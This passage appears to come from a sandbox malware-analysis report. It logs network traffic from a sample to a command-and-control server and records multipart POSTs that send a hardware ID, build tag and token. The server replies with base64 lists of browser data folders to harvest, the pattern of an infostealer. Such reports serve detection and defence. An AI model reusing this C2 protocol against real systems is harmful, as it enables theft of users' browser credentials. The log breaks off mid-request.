Aug 30, 2024 00:48:12.545001984 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.545028925 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.545033932 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.545047998 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.545058012 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.545070887 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.545075893 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.545082092 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.545094013 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.545099974 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.545104027 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.545116901 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.545125961 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.545130014 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.545140982 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.545140982 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.545152903 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.545164108 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.545167923 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.545176029 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.545192957 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.545214891 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.629497051 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.629511118 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.629601955 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.659667015 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.666253090 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.906414986 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.906457901 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.906471014 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.906493902 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.906517982 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.906589031 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.906600952 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.906632900 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.906634092 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.906646013 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.906657934 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.906661987 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.906668901 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.906683922 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.906713009 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.906740904 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.906753063 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.906763077 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.906773090 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.906774044 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.906797886 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.906821966 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.906934023 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.906945944 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.906958103 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.906974077 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.906975985 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.906985998 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.906992912 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.907000065 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.907008886 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.907012939 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.907037973 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.907049894 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.907145023 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.907182932 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.907267094 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.907278061 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.907286882 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.907310963 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.907311916 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.907322884 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.907335043 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.907340050 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.907346010 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.907356977 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.907370090 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.907371044 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.907399893 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.907428980 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.907601118 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.907613039 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.907622099 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.907632113 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.907643080 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.907645941 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.907655001 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.907666922 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.907670975 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.907676935 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.907687902 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.907689095 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.907701015 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.907711029 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.907726049 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.907754898 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.907923937 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.907934904 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.907965899 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.907989979 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.908025980 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.908121109 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.908138990 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.908150911 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.908160925 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.908162117 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.908171892 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.908174992 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.908185005 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.908186913 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.908198118 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.908206940 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.908209085 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.908220053 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.908230066 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.908235073 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.908241034 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.908252001 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.908256054 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.908265114 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.908272982 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.908277988 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.908301115 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.908328056 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.908675909 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.908688068 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.908709049 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.908715963 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.908725977 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.908731937 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.908737898 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.908749104 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.908751011 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.908760071 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.908771038 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.908771992 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.908782005 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.908790112 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.908802032 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.908813000 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.908817053 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.908826113 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.908835888 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.908839941 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.908847094 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.908847094 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.908859968 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.908870935 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.908878088 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.908881903 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.908894062 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.908902884 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.908907890 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.908919096 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.908920050 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.908947945 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.908962965 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.909316063 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.909336090 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.909347057 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.909356117 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.909358025 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:12.909370899 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.909389973 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:12.909405947 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:13.461723089 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:13.461774111 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:13.468318939 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:13.468329906 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:14.295829058 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:14.295903921 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:14.377152920 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:14.382045031 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:14.625957012 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:14.625976086 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:14.625988007 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:14.626033068 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:14.626085997 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:14.628353119 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:14.633076906 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:14.902343035 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:14.902429104 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:14.917067051 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:14.924253941 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:16.014456034 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:16.014626026 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:16.014800072 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:16.014880896 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:16.320039988 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:16.328597069 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:16.582369089 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:16.582386971 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:16.582400084 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:16.582439899 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:16.582453966 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:16.582474947 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:16.582529068 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:16.592736959 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:16.599796057 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:17.389978886 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:17.390068054 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:22.395226002 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:22.395296097 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:22.410459042 CEST	49704	80	192.168.2.5	185.215.113.100

HTTP Request Dependency Graph

185.215.113.100

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	185.215.113.100	80	5320	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Aug 30, 2024 00:47:58.690099955 CEST	90	OUT	GET / HTTP/1.1 Host: 185.215.113.100 Connection: Keep-Alive Cache-Control: no-cache
Aug 30, 2024 00:47:59.513787985 CEST	203	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 22:47:59 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Aug 30, 2024 00:47:59.529089928 CEST	413	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHDHJEBFBFHJECAKFCAA Host: 185.215.113.100 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 37 43 44 31 34 35 35 38 39 35 36 31 31 36 36 31 37 30 34 33 30 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6c 65 76 61 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 2d 2d 0d 0a Data Ascii: ------GHDHJEBFBFHJECAKFCAAContent-Disposition: form-data; name="hwid"F7CD145589561166170430------GHDHJEBFBFHJECAKFCAAContent-Disposition: form-data; name="build"leva------GHDHJEBFBFHJECAKFCAA--
Aug 30, 2024 00:47:59.792609930 CEST	407	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 22:47:59 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4d 6a 63 7a 4d 47 46 6d 5a 6a 64 6c 4d 6d 55 34 4d 44 49 31 4e 7a 68 6d 4d 44 45 31 59 32 45 35 5a 6a 52 6c 5a 6a 41 34 4d 32 52 6b 5a 47 46 6b 59 6a 4e 69 59 6d 46 6d 5a 54 64 6c 4f 44 6c 6b 4e 57 51 34 4e 6d 5a 68 5a 44 45 77 5a 54 55 31 5a 6a 64 6a 4f 47 4d 7a 4d 7a 52 6c 5a 6a 67 32 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: MjczMGFmZjdlMmU4MDI1NzhmMDE1Y2E5ZjRlZjA4M2RkZGFkYjNiYmFmZTdlODlkNWQ4NmZhZDEwZTU1ZjdjOGMzMzRlZjg2fHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Aug 30, 2024 00:47:59.793852091 CEST	470	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IECAFHDBGHJKFIDHJJJE Host: 185.215.113.100 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 45 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 37 33 30 61 66 66 37 65 32 65 38 30 32 35 37 38 66 30 31 35 63 61 39 66 34 65 66 30 38 33 64 64 64 61 64 62 33 62 62 61 66 65 37 65 38 39 64 35 64 38 36 66 61 64 31 30 65 35 35 66 37 63 38 63 33 33 34 65 66 38 36 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 2d 2d 0d 0a Data Ascii: ------IECAFHDBGHJKFIDHJJJEContent-Disposition: form-data; name="token"2730aff7e2e802578f015ca9f4ef083dddadb3bbafe7e89d5d86fad10e55f7c8c334ef86------IECAFHDBGHJKFIDHJJJEContent-Disposition: form-data; name="message"browsers------IECAFHDBGHJKFIDHJJJE--
Aug 30, 2024 00:48:00.041354895 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 22:47:59 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 1520 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
Aug 30, 2024 00:48:00.041373014 CEST	512	IN	Data Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
Aug 30, 2024 00:48:00.042754889 CEST	469	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCAAEHJDBKJJKFHJEBKF Host: 185.215.113.100 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 37 33 30 61 66 66 37 65 32 65 38 30 32 35 37 38 66 30 31 35 63 61 39 66 34 65 66 30 38 33 64 64 64 61 64 62 33 62 62 61 66 65 37 65 38 39 64 35 64 38 36 66 61 64 31 30 65 35 35 66 37 63 38 63 33 33 34 65 66 38 36 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 2d 2d 0d 0a Data Ascii: ------FCAAEHJDBKJJKFHJEBKFContent-Disposition: 